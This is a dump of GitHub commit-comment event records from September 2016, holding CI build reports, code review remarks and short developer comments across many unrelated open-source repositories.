{"id":"4602530196","type":"CommitCommentEvent","actor":{"login":"Ghilt"},"repo":{"name":"Ghilt/simulaton"},"payload":{"comment":{"id":19130430,"position":null,"line":null,"path":null,"commit_id":"04276a4b5d764edec07fc70adacbedad96bbda6e","created_at":"2016-09-22T13:45:25Z","updated_at":"2016-09-22T13:45:25Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;feccNTZy&#x2F;3-implement-proper-rate-class-for-needs\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement proper rate class for needs</a>"}},"created_at":"2016-09-22T13:45:25Z"}
{"id":"4602534149","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19130442,"position":null,"line":null,"path":null,"commit_id":"f2ac9522781cf1a560bb935d4e333fba72de3778","created_at":"2016-09-22T13:46:03Z","updated_at":"2016-09-22T13:46:03Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1768 of 1768 tests passed, 1 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T13:46:03Z"}
{"id":"4602536271","type":"CommitCommentEvent","actor":{"login":"mifadev"},"repo":{"name":"datak1d/datak1d.github.io"},"payload":{"comment":{"id":19130447,"position":null,"line":null,"path":null,"commit_id":"d9043a58b101a316a24fa419914289fe613039f6","created_at":"2016-09-22T13:46:23Z","updated_at":"2016-09-22T13:46:23Z","body":"Поменял модификатор класса, так думаю, логичнее смотрится."}},"created_at":"2016-09-22T13:46:23Z"}
{"id":"4602539532","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19130454,"position":null,"line":null,"path":null,"commit_id":"f2ac9522781cf1a560bb935d4e333fba72de3778","created_at":"2016-09-22T13:46:54Z","updated_at":"2016-09-22T13:46:54Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T13:46:54Z"}
{"id":"4602544207","type":"CommitCommentEvent","actor":{"login":"warmdev"},"repo":{"name":"comses/miracle"},"payload":{"comment":{"id":19130470,"position":null,"line":null,"path":null,"commit_id":"00b18217779636548bd2641b57c28269ef5c1de4","created_at":"2016-09-22T13:47:43Z","updated_at":"2016-09-22T13:47:43Z","body":"It appears to be an incompatibility with the latest version of Shiny (0.14). Here is the error log I managed to get (strangely the log file was generated but got deleted very soon after...). We can try to install an older version and all compatible dependencies using the `checkpoint` package. I'll try it out.\r\n\r\n```\r\nWarning: Error in build: Tabs should all be unnamed arguments, but some are named: id\r\nStack trace (innermost first):\r\n    48: build\r\n    47: FUN\r\n    46: lapply\r\n    45: build\r\n    44: buildTabset\r\n    43: <Anonymous>\r\n    42: do.call\r\n    41: shinyUI\r\n     1: runApp\r\nError : An error has occurred. Check your logs or contact the app author for clarification.\r\n```"}},"created_at":"2016-09-22T13:47:43Z"}
{"id":"4602548659","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130482,"position":null,"line":null,"path":null,"commit_id":"4306d887a6bc7f02e7626ddb859fde24eaf14c21","created_at":"2016-09-22T13:48:26Z","updated_at":"2016-09-22T13:48:26Z","body":"fast-forwarding master to borshop-integration-371-master = 1b20b7c3"}},"created_at":"2016-09-22T13:48:26Z"}
{"id":"4602548729","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130483,"position":null,"line":null,"path":null,"commit_id":"e22016062ee776090297569f6bed8658e1fbb20b","created_at":"2016-09-22T13:48:26Z","updated_at":"2016-09-22T13:48:26Z","body":"Merge sha a46e8c4f is stale."}},"created_at":"2016-09-22T13:48:26Z"}
{"id":"4602548786","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130484,"position":null,"line":null,"path":null,"commit_id":"e22016062ee776090297569f6bed8658e1fbb20b","created_at":"2016-09-22T13:48:27Z","updated_at":"2016-09-22T13:48:27Z","body":"merging redink/lager/crash_log_undefined = e2201606 into borshop-integration-364-crash_log_undefined"}},"created_at":"2016-09-22T13:48:27Z"}
{"id":"4602548818","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130485,"position":null,"line":null,"path":null,"commit_id":"e22016062ee776090297569f6bed8658e1fbb20b","created_at":"2016-09-22T13:48:27Z","updated_at":"2016-09-22T13:48:27Z","body":"redink/lager/crash_log_undefined = e2201606 merged ok, testing candidate = 049f3a93"}},"created_at":"2016-09-22T13:48:27Z"}
{"id":"4602550354","type":"CommitCommentEvent","actor":{"login":"KnightJoker"},"repo":{"name":"TeamOfUs/guess-and-draw"},"payload":{"comment":{"id":19130493,"position":5,"line":3,"path":"bin/websocket-server.js","commit_id":"6ea31d6f0c3e6e4d32afc6e5e4154bef5b6e0a46","created_at":"2016-09-22T13:48:43Z","updated_at":"2016-09-22T13:48:43Z","body":"= =+小学弟么？\r\n头像很强势~"}},"created_at":"2016-09-22T13:48:43Z"}
{"id":"4602552139","type":"CommitCommentEvent","actor":{"login":"eldk"},"repo":{"name":"facebook/fresco"},"payload":{"comment":{"id":19130499,"position":6,"line":25,"path":"gradle.properties","commit_id":"05fae0837124b45983a9bc205509a5284c607b94","created_at":"2016-09-22T13:49:01Z","updated_at":"2016-09-22T13:49:01Z","body":"Hello,\r\n\r\nThis break support for users of last 32 bits  Android SDK Platform-tools (23.0.1 - https://code.google.com/p/android/issues/detail?id=196866) as 24.0.2/3 Android SDK Platform-tools is needed when update to 24.0.2 Android SDK Build-Tools.\r\n\r\nSetting BUILD_TOOLS_VERSION=23.0.3 (Android SDK Build-Tools 23.0.3 - https://developer.android.com/studio/releases/build-tools.html) solve this (Android Studio 1.5 + last 32 bits Android SDK Platform-tools 23.0.1 + Android SDK Build-Tools 23.0.3 and target = API 24).\r\n\r\nThanks,\r\n\r\nEric"}},"created_at":"2016-09-22T13:49:01Z"}
{"id":"4602557156","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"rolfea/BlocRecord"},"payload":{"comment":{"id":19130508,"position":10,"line":10,"path":"assignment_answers.txt","commit_id":"4ac3f3d4705fd48e95700a7bfa7630a633b105aa","created_at":"2016-09-22T13:49:51Z","updated_at":"2016-09-22T13:49:51Z","body":"These values collectively are often referred to as a _record_."}},"created_at":"2016-09-22T13:49:51Z"}
{"id":"4602557463","type":"CommitCommentEvent","actor":{"login":"ExtReMLapin"},"repo":{"name":"FPtje/DarkRP"},"payload":{"comment":{"id":19130509,"position":14,"line":201,"path":"gamemode/modules/chat/sv_chatcommands.lua","commit_id":"bba9494a471d8f2044398102b0b160dfb73c6337","created_at":"2016-09-22T13:49:55Z","updated_at":"2016-09-22T13:49:55Z","body":"penis"}},"created_at":"2016-09-22T13:49:55Z"}
{"id":"4602561013","type":"CommitCommentEvent","actor":{"login":"sg-"},"repo":{"name":"ARMmbed/mbed-os"},"payload":{"comment":{"id":19130521,"position":68,"line":861,"path":"hal/targets.json","commit_id":"e68b550c2a3671f82d2a8e7a0b3d24df8e48c275","created_at":"2016-09-22T13:50:30Z","updated_at":"2016-09-22T13:50:30Z","body":"This line"}},"created_at":"2016-09-22T13:50:30Z"}
{"id":"4602561392","type":"CommitCommentEvent","actor":{"login":"embray"},"repo":{"name":"OpenDreamKit/OpenDreamKit.github.io"},"payload":{"comment":{"id":19130525,"position":14,"line":14,"path":"_posts/2016-08-18-emerging-docker.md","commit_id":"34c601d0ff3681081f5ca5fb9c2afbd932bd3378","created_at":"2016-09-22T13:50:34Z","updated_at":"2016-09-22T13:50:34Z","body":"I should add, one can imagine that with the addition of the Windows Subsystem for Linux, it may be possible to run Linux docker containers natively on Windows (and hence within a Windows container).  *Then* the Linux VM could truly be dropped.  The technology isn't quite there yet, but I can't imagine they're not moving things in that direction--it seems obvious to me."}},"created_at":"2016-09-22T13:50:34Z"}
{"id":"4602561596","type":"CommitCommentEvent","actor":{"login":"NachiketNamjoshi"},"repo":{"name":"NachiketNamjoshi/BlackReactor_onyx"},"payload":{"comment":{"id":19130526,"position":null,"line":null,"path":null,"commit_id":"3bfeb8ff50043e7164a5033ef083958a6be56c03","created_at":"2016-09-22T13:50:36Z","updated_at":"2016-09-22T13:50:36Z","body":"prove it."}},"created_at":"2016-09-22T13:50:36Z"}
{"id":"4602564508","type":"CommitCommentEvent","actor":{"login":"sandipagarwal"},"repo":{"name":"JoshLabs/git-pylint-commit-hook"},"payload":{"comment":{"id":19130534,"position":25,"line":70,"path":"git-pylint-commit-hook","commit_id":"d82fb72191ecf06e3189c4ce5083d18a7771abad","created_at":"2016-09-22T13:51:04Z","updated_at":"2016-09-22T13:51:04Z","body":"@sebdah Why have we done this? I am facing a problem that due to this all my files in my repo are getting deleted. Removing/Commenting this solved the issue."}},"created_at":"2016-09-22T13:51:04Z"}
{"id":"4602566254","type":"CommitCommentEvent","actor":{"login":"Helbinos"},"repo":{"name":"Helbinos/M2_SITIS_2016"},"payload":{"comment":{"id":19130541,"position":1,"line":4,"path":"main/src/Toto.java","commit_id":"b6b319c71ddb4d16b63431f420d798a48c00cc5a","created_at":"2016-09-22T13:51:22Z","updated_at":"2016-09-22T13:51:22Z","body":"ça c'est du code !!"}},"created_at":"2016-09-22T13:51:22Z"}
{"id":"4602570501","type":"CommitCommentEvent","actor":{"login":"emeryberger"},"repo":{"name":"emeryberger/CSrankings"},"payload":{"comment":{"id":19130556,"position":null,"line":null,"path":null,"commit_id":"54de9a3dd1cc11dac87141df78712d26a1beeb47","created_at":"2016-09-22T13:52:04Z","updated_at":"2016-09-22T13:52:04Z","body":"The results are not significantly smaller - using rounding had no impact on the ordering of the top 15 rankings, but had the expected effect of increasing roughly half (7) of the results by 0.1. But all things considered, using round probably makes more sense."}},"created_at":"2016-09-22T13:52:04Z"}
{"id":"4602570927","type":"CommitCommentEvent","actor":{"login":"stratakis"},"repo":{"name":"fedora-python/python2-spec"},"payload":{"comment":{"id":19130558,"position":null,"line":null,"path":null,"commit_id":"dfdd96e653d65ce68359553b378104fec260589c","created_at":"2016-09-22T13:52:09Z","updated_at":"2016-09-22T13:52:09Z","body":"All the maintainers have been contacted. Some packages are already fixed. Will monitor the status of the rest."}},"created_at":"2016-09-22T13:52:09Z"}
{"id":"4602575533","type":"CommitCommentEvent","actor":{"login":"acotiuga"},"repo":{"name":"xwiki-contrib/application-meeting"},"payload":{"comment":{"id":19130569,"position":10,"line":26,"path":"ui/src/main/resources/MeetingCode/RecentMeetingsPanel.xml","commit_id":"2f2a7ab1a9ce4dc87c628e0c98a4350275fb5cbb","created_at":"2016-09-22T13:52:52Z","updated_at":"2016-09-22T13:52:52Z","body":"Fixed in 41c122f64537a6edc82f929f9081cc7aeefa4893."}},"created_at":"2016-09-22T13:52:52Z"}
{"id":"4602575800","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19130572,"position":5,"line":148,"path":"main/inc/lib/agenda.lib.php","commit_id":"1b320e57725135eb8c8eff9a8367de90addd0ece","created_at":"2016-09-22T13:52:54Z","updated_at":"2016-09-22T13:52:54Z","body":"remove_XSS should not be added when saving into the DB"}},"created_at":"2016-09-22T13:52:54Z"}
{"id":"4602578798","type":"CommitCommentEvent","actor":{"login":"sandipagarwal"},"repo":{"name":"sebdah/git-pylint-commit-hook"},"payload":{"comment":{"id":19130579,"position":25,"line":70,"path":"git-pylint-commit-hook","commit_id":"d82fb72191ecf06e3189c4ce5083d18a7771abad","created_at":"2016-09-22T13:53:22Z","updated_at":"2016-09-22T13:53:22Z","body":"@sebdah @lagelalegal Why have we done this? I am facing a problem that due to this all my files in my repo are getting deleted. Removing/Commenting this solved the issue."}},"created_at":"2016-09-22T13:53:22Z"}
{"id":"4602583458","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19130587,"position":null,"line":null,"path":null,"commit_id":"f2ac9522781cf1a560bb935d4e333fba72de3778","created_at":"2016-09-22T13:54:08Z","updated_at":"2016-09-22T13:54:08Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2337 of 2340 tests passed, 1 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T13:54:08Z"}
{"id":"4602584743","type":"CommitCommentEvent","actor":{"login":"kohr-h"},"repo":{"name":"odlgroup/odl"},"payload":{"comment":{"id":19130592,"position":11,"line":27,"path":"doc/source/release_notes.rst","commit_id":"804b04e8331500745b3c5ba0c460d356c7235f9c","created_at":"2016-09-22T13:54:20Z","updated_at":"2016-09-22T13:54:20Z","body":"Missing space after `IndicatorNonnegativity`, won't be rendered properly. Perhaps this can be fixed during the ominous master rebase :-)"}},"created_at":"2016-09-22T13:54:20Z"}
{"id":"4602589596","type":"CommitCommentEvent","actor":{"login":"kamarush"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19130597,"position":5,"line":381,"path":"device.mk","commit_id":"ef939f66968090fc8b213b7271f1be363598f427","created_at":"2016-09-22T13:55:01Z","updated_at":"2016-09-22T13:55:01Z","body":"This will fix the HW encoder and camcorder glitch"}},"created_at":"2016-09-22T13:55:01Z"}
{"id":"4602593399","type":"CommitCommentEvent","actor":{"login":"adler-j"},"repo":{"name":"odlgroup/odl"},"payload":{"comment":{"id":19130606,"position":11,"line":27,"path":"doc/source/release_notes.rst","commit_id":"804b04e8331500745b3c5ba0c460d356c7235f9c","created_at":"2016-09-22T13:55:40Z","updated_at":"2016-09-22T13:55:40Z","body":"Noticed it as well but I suppose we'll format these changes properly when the major 0.5 release comes."}},"created_at":"2016-09-22T13:55:40Z"}
{"id":"4602595261","type":"CommitCommentEvent","actor":{"login":"RajaSrinivasan"},"repo":{"name":"RajaSrinivasan/Projects"},"payload":{"comment":{"id":19130613,"position":null,"line":null,"path":null,"commit_id":"a30c4e45c586f2b61a5c6a9a41a64103278aae8c","created_at":"2016-09-22T13:55:58Z","updated_at":"2016-09-22T13:55:58Z","body":"Reference Req"}},"created_at":"2016-09-22T13:55:58Z"}
{"id":"4602596229","type":"CommitCommentEvent","actor":{"login":"benjacernuda"},"repo":{"name":"benjacernuda/ChromeSPPropertiesAdmin"},"payload":{"comment":{"id":19130616,"position":null,"line":null,"path":null,"commit_id":"6f375256c66ac77f586ab9b8504a0dad05e8473e","created_at":"2016-09-22T13:56:09Z","updated_at":"2016-09-22T13:56:09Z","body":"add the working on it in the load of the Features and some changes in the styles"}},"created_at":"2016-09-22T13:56:09Z"}
{"id":"4602597349","type":"CommitCommentEvent","actor":{"login":"nkaraolis"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19130620,"position":69,"line":113,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-22T13:56:19Z","updated_at":"2016-09-22T13:56:19Z","body":"Fixed :+1: "}},"created_at":"2016-09-22T13:56:19Z"}
{"id":"4602598650","type":"CommitCommentEvent","actor":{"login":"nkaraolis"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19130621,"position":83,"line":127,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-22T13:56:31Z","updated_at":"2016-09-22T13:56:31Z","body":"Fixed :+1: "}},"created_at":"2016-09-22T13:56:31Z"}
{"id":"4602602838","type":"CommitCommentEvent","actor":{"login":"rodrigohrech"},"repo":{"name":"gomex/cryptohack.net"},"payload":{"comment":{"id":19130630,"position":7,"line":7,"path":"content/pt/whatsapp.md","commit_id":"c568aead66c9435a1d5efb71804f7eb3b117a416","created_at":"2016-09-22T13:56:59Z","updated_at":"2016-09-22T13:56:59Z","body":"Eu acredito que deva ser trocado o trecho \r\n\r\n> ao ser comprado pelo Mark Zuckerberg  <\r\n\r\npor\r\n\r\n> ao ser comprado pelo Facebook <\r\n\r\nAssim, retrata com mais fidelidade a intenção do autor do texto original."}},"created_at":"2016-09-22T13:56:59Z"}
{"id":"4602606394","type":"CommitCommentEvent","actor":{"login":"yiminghe"},"repo":{"name":"react-component/m-cascader"},"payload":{"comment":{"id":19130641,"position":null,"line":null,"path":null,"commit_id":"24b52f553596570f55e41ae54cf4284c718cc85e","created_at":"2016-09-22T13:57:30Z","updated_at":"2016-09-22T13:57:30Z","body":"造成以前版本不兼容"}},"created_at":"2016-09-22T13:57:30Z"}
{"id":"4602607339","type":"CommitCommentEvent","actor":{"login":"nkaraolis"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19130642,"position":88,"line":132,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-22T13:57:39Z","updated_at":"2016-09-22T13:57:39Z","body":"Fixed :+1: "}},"created_at":"2016-09-22T13:57:39Z"}
{"id":"4602609219","type":"CommitCommentEvent","actor":{"login":"gareth"},"repo":{"name":"bhenderson/minitest-ci"},"payload":{"comment":{"id":19130646,"position":null,"line":null,"path":null,"commit_id":"695c2fd5fb8a19f052c481c2c554b3a7f4c20ad1","created_at":"2016-09-22T13:57:56Z","updated_at":"2016-09-22T13:57:56Z","body":"Do you know if CircleCI also have ownership of the [Rubygem](https://rubygems.org/gems/minitest-ci)?"}},"created_at":"2016-09-22T13:57:56Z"}
{"id":"4602618826","type":"CommitCommentEvent","actor":{"login":"igor04"},"repo":{"name":"ssut/telegram-rb"},"payload":{"comment":{"id":19130659,"position":null,"line":null,"path":null,"commit_id":"9d8cea498e56a682c075130b86c0f1f1e6ee2523","created_at":"2016-09-22T13:59:27Z","updated_at":"2016-09-22T13:59:27Z","body":"@ssut why do we need replace `\"` to `\\\"` in messages? As result we have messages with unnecessary char `\\` "}},"created_at":"2016-09-22T13:59:27Z"}
{"id":"4602621590","type":"CommitCommentEvent","actor":{"login":"nkaraolis"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19130665,"position":98,"line":142,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-22T13:59:52Z","updated_at":"2016-09-22T13:59:52Z","body":"Fixed :+1: "}},"created_at":"2016-09-22T13:59:52Z"}
{"id":"4602625827","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130679,"position":null,"line":null,"path":null,"commit_id":"e22016062ee776090297569f6bed8658e1fbb20b","created_at":"2016-09-22T14:00:30Z","updated_at":"2016-09-22T14:00:30Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-lager/builds/437\n"}},"created_at":"2016-09-22T14:00:30Z"}
{"id":"4602625851","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130680,"position":null,"line":null,"path":null,"commit_id":"fce24bc87685a36a68c4db846a86f6a646f0a920","created_at":"2016-09-22T14:00:31Z","updated_at":"2016-09-22T14:00:31Z","body":"saw approval from macintux\nat https://github.com/basho/lager/commit/fce24bc87685a36a68c4db846a86f6a646f0a920"}},"created_at":"2016-09-22T14:00:31Z"}
{"id":"4602625880","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130681,"position":null,"line":null,"path":null,"commit_id":"fce24bc87685a36a68c4db846a86f6a646f0a920","created_at":"2016-09-22T14:00:31Z","updated_at":"2016-09-22T14:00:31Z","body":"merging basho/lager/bugfix_dr_lager_file_backend_old_config_compat = fce24bc8 into borshop-integration-374-bugfix_dr_lager_file_backend_old_config_compat"}},"created_at":"2016-09-22T14:00:31Z"}
{"id":"4602625917","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130682,"position":null,"line":null,"path":null,"commit_id":"fce24bc87685a36a68c4db846a86f6a646f0a920","created_at":"2016-09-22T14:00:31Z","updated_at":"2016-09-22T14:00:31Z","body":"basho/lager/bugfix_dr_lager_file_backend_old_config_compat = fce24bc8 merged ok, testing candidate = c2adae71"}},"created_at":"2016-09-22T14:00:31Z"}
{"id":"4602626796","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"rolfea/BlocRecord"},"payload":{"comment":{"id":19130683,"position":27,"line":27,"path":"assignment_answers.txt","commit_id":"4ac3f3d4705fd48e95700a7bfa7630a633b105aa","created_at":"2016-09-22T14:00:39Z","updated_at":"2016-09-22T14:00:39Z","body":"Not quite on this one. You did not set any values to the fields, and the `WHERE` condition is unnecessarily complicated (yes, _that_ is more complicated than it needs to be)."}},"created_at":"2016-09-22T14:00:39Z"}
{"id":"4602628477","type":"CommitCommentEvent","actor":{"login":"asarfraaz"},"repo":{"name":"naveenbajaj123/python"},"payload":{"comment":{"id":19130687,"position":null,"line":null,"path":null,"commit_id":"afc971dcf16b2a03ed2dc29c5e3869eefb9eba3f","created_at":"2016-09-22T14:00:55Z","updated_at":"2016-09-22T14:00:55Z","body":"Good attempt.\r\n\r\nBut the question was to ask the user for 2 numbers. Can you please fix the code accordingly ?"}},"created_at":"2016-09-22T14:00:55Z"}
{"id":"4602629051","type":"CommitCommentEvent","actor":{"login":"Beloya"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19130689,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-22T14:01:01Z","updated_at":"2016-09-22T14:01:01Z","body":"你看下天翼的网页，有个通知，是说月底停止旧算法"}},"created_at":"2016-09-22T14:01:01Z"}
{"id":"4602629571","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"WebAudio/web-audio-api"},"payload":{"comment":{"id":19130692,"position":60,"line":3425,"path":"index.html","commit_id":"77323cf07a408fb490efaad3d738b19ca3fe2ee3","created_at":"2016-09-22T14:01:07Z","updated_at":"2016-09-22T14:01:07Z","body":"Need to specify that thresholds are evaluated a-rate"}},"created_at":"2016-09-22T14:01:07Z"}
{"id":"4602632051","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19130697,"position":6,"line":709,"path":"src/psl.c","commit_id":"e2812e8c4cff7daba154f851945fd1e217a1ffb6","created_at":"2016-09-22T14:01:29Z","updated_at":"2016-09-22T14:01:29Z","body":"This will potentially mean setting `ascii` to `NULL` in the failure case."}},"created_at":"2016-09-22T14:01:29Z"}
{"id":"4602635892","type":"CommitCommentEvent","actor":{"login":"MatousJobanek"},"repo":{"name":"iocanel/arquillian-cube"},"payload":{"comment":{"id":19130708,"position":23,"line":29,"path":"kubernetes/kubernetes/src/main/java/org/arquillian/cube/kubernetes/impl/enricher/AbstractKubernetesResourceProvider.java","commit_id":"81bff2066c1abba4f5e63d97e48687aac563a002","created_at":"2016-09-22T14:02:07Z","updated_at":"2016-09-22T14:02:07Z","body":"How about using fully qualified name of the annotation: "}},"created_at":"2016-09-22T14:02:07Z"}
{"id":"4602635934","type":"CommitCommentEvent","actor":{"login":"hellais"},"repo":{"name":"TheTorProject/lepidopter"},"payload":{"comment":{"id":19130709,"position":4,"line":4,"path":"ChangeLog.md","commit_id":"e73a7b3d26b6d08882f34ccb6cba129bd92a0a48","created_at":"2016-09-22T14:02:07Z","updated_at":"2016-09-22T14:02:07Z","body":"Maybe you should have also updated to the latest ooniprobe rc2 in this. Can you repush a tag that integrates that version of ooniprobe?"}},"created_at":"2016-09-22T14:02:07Z"}
{"id":"4602635999","type":"CommitCommentEvent","actor":{"login":"lukebakken"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19130710,"position":84,"line":106,"path":"src/riak_kv_pb_index.erl","commit_id":"ccb019fdc02ad545a9914adc391c56d423550630","created_at":"2016-09-22T14:02:07Z","updated_at":"2016-09-22T14:02:07Z","body":"The new library *can* do this correctly, however, we will be using it in a compatibility mode that emulates the current behavior. Otherwise, I am 100% sure there would be unintended consequences with Riak."}},"created_at":"2016-09-22T14:02:07Z"}
{"id":"4602637627","type":"CommitCommentEvent","actor":{"login":"Hsyneve"},"repo":{"name":"Hsyneve/hsy0922"},"payload":{"comment":{"id":19130713,"position":5,"line":5,"path":"07/css/index.css","commit_id":"00e3493f8b0f18b35eb024aba8169049e7f4c046","created_at":"2016-09-22T14:02:24Z","updated_at":"2016-09-22T14:02:24Z","body":"333"}},"created_at":"2016-09-22T14:02:24Z"}
{"id":"4602638030","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19130717,"position":66,"line":1681,"path":"src/psl.c","commit_id":"e2812e8c4cff7daba154f851945fd1e217a1ffb6","created_at":"2016-09-22T14:02:27Z","updated_at":"2016-09-22T14:02:27Z","body":"stray printf"}},"created_at":"2016-09-22T14:02:27Z"}
{"id":"4602642311","type":"CommitCommentEvent","actor":{"login":"rodrigohrech"},"repo":{"name":"gomex/cryptohack.net"},"payload":{"comment":{"id":19130725,"position":14,"line":14,"path":"content/pt/whatsapp.md","commit_id":"c568aead66c9435a1d5efb71804f7eb3b117a416","created_at":"2016-09-22T14:03:09Z","updated_at":"2016-09-22T14:03:09Z","body":"Sugiro acrescentar no trecho\r\n> como fomos treinados para fazê-lo \r\n\r\npor\r\n\r\n>como nós, infelizmente, têm sido treinados para fazer."}},"created_at":"2016-09-22T14:03:09Z"}
{"id":"4602643085","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"WebAudio/web-audio-api"},"payload":{"comment":{"id":19130728,"position":78,"line":3443,"path":"index.html","commit_id":"77323cf07a408fb490efaad3d738b19ca3fe2ee3","created_at":"2016-09-22T14:03:15Z","updated_at":"2016-09-22T14:03:15Z","body":"Need language that makes this something that can be evaluated at any point even if the `hold` value changes during the interval that it's active\r\n"}},"created_at":"2016-09-22T14:03:15Z"}
{"id":"4602643225","type":"CommitCommentEvent","actor":{"login":"lukebakken"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19130730,"position":84,"line":106,"path":"src/riak_kv_pb_index.erl","commit_id":"ccb019fdc02ad545a9914adc391c56d423550630","created_at":"2016-09-22T14:03:17Z","updated_at":"2016-09-22T14:03:17Z","body":"@JeetKunDoug - read more here if you're interested: https://github.com/tomas-abrahamsson/gpb/issues/82"}},"created_at":"2016-09-22T14:03:17Z"}
{"id":"4602643493","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19130731,"position":null,"line":null,"path":null,"commit_id":"755c23d52fc76a2f190f0ad59439181ded9f3bd6","created_at":"2016-09-22T14:03:19Z","updated_at":"2016-09-22T14:03:19Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6](http://build.prxm.it:8813/viewLog.html?buildId=3677&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:44"}},"created_at":"2016-09-22T14:03:19Z"}
